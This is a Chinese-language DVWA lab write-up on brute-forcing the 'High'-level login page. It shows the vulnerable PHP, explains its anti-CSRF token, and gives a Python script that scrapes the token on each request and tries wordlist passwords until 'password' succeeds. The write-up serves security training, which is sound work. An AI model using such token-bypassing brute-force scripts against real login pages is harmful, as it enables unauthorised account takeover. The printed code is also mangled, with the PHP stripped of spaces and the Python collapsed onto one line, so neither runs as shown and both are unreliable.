DVWA實驗之Brute Force(暴力破解)- High
有關DVWA環境搭建的教程請參考:
Brute Force,即暴力(破解),是指黑客利用密碼字典,使用窮舉法猜解出用戶口令,是現在最為廣泛使用的攻擊手法之一。
這里我們先將安全等級設為 High
這里我們開始高級實驗~
服務器端核心代碼
<?php if(isset($_GET['Login'])){ //CheckAnti-CSRFtoken checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php'); //Sanitiseusernameinput $user=$_GET['username']; $user=stripslashes($user); $user=mysql_real_escape_string($user); //Sanitisepasswordinput $pass=$_GET['password']; $pass=stripslashes($pass); $pass=mysql_real_escape_string($pass); $pass=md5($pass); //Checkdatabase $query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';"; $result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>'); if($result&&mysql_num_rows($result)==1){ //Getusersdetails $avatar=mysql_result($result,0,"avatar"); //Loginsuccessfulecho"<p>Welcometothepasswordprotectedarea{$user}</p>"; echo"<imgsrc="{$avatar}"/>"; } else{ //Loginfailed sleep(rand(0,3)); echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>"; } mysql_close(); } //GenerateAnti-CSRFtoken generateSessionToken(); ?>
代碼解讀:
1. High級別的代碼加入了Token,可以抵御CSRF攻擊
2.增加了爆破的難度
3. High級別的代碼中,使用了stripslashes(去除字符串中的反斜線字符,如果有兩個連續的反斜線,則只去掉一個)、 mysql_real_escape_string對參數username、password進行過濾、轉義,進一步抵御sql注入
抓個包分析一下:
可以看到,登錄驗證時提交了四個參數:username、password、Login以及user_token
每次服務器返回的登陸頁面中都會包含一個隨機的user_token的值,用戶每次登錄時都要將user_token一起提交。服務器收到請求后,會優先做token的檢查,再進行sql查詢。
(stripslashes(去除字符串中的反斜線字符,如果有兩個連續的反斜線,則只去掉一個)、 mysql_real_escape_string對參數username、password進行過濾、轉義,進一步抵御sql注入)
由於加入了Anti-CSRFtoken預防無腦爆破,就不使用burpsuite啦~
參考大佬寫的腳本
from bs4 import BeautifulSoup import urllib2 header={ 'Host': '192.168.xxx.xxx', //目標主機(DVWA)的ip 'Cache-Control': 'max-age=0', 'If-None-Match': "307-52156c6a290c0", 'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36', 'Accept': '*/*', 'Referer': 'http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/index.php', 'Accept-Encoding': 'gzip, deflate, sdch', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Cookie': 'security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2'} requrl = "http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/" def get_token(requrl,header): req = urllib2.Request(url=requrl,headers=header) response = urllib2.urlopen(req) print response.getcode(), the_page = response.read() print len(the_page) soup = BeautifulSoup(the_page,"html.parser") user_token = soup.form.input.input.input.input["value"] #get the user_token return user_token user_token = get_token(requrl,header) i=0for line in open("rkolin.txt"): requrl = "http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token i = i+1 print i,'admin',line.strip(), user_token = get_token(requrl,header) if (i == 10): break
get_token的功能是通過python的BeautifulSoup庫從html頁面中抓取user_token的值。
對比結果看到,密碼為password時返回的長度不太一樣,手工驗證,登錄成功,爆破完成。
參考資料:
https://www.cnblogs.com/pinocchioatbeijing/archive/2012/03/20/2407869.html